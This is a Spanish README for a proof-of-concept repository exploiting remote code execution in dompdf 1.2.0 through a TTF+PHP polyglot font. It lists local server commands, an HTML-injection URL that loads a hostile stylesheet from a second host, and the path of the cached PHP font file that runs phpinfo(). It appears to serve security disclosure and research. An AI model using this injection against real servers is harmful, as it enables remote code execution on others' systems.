
Exploit RCE para dompdf
Este repositorio contiene una aplicación de demostración vulnerable que utiliza dompdf 1.2.0 y un exploit que logra ejecución remota de código mediante un archivo políglota ttf+php.

Para más detalles, visite https://positive.security/blog/dompdf-rce
$ cd application
$ php -S localhost:9000
$ cd exploit
$ php -S localhost:9001
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
phpinfo()http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
Tenga en cuenta: En caso de que utilice dominios o puertos diferentes, edite exploit/exploit.css en consecuencia y consulte para ver el nombre completo del archivo de fuente.
application/dompdf/lib/fonts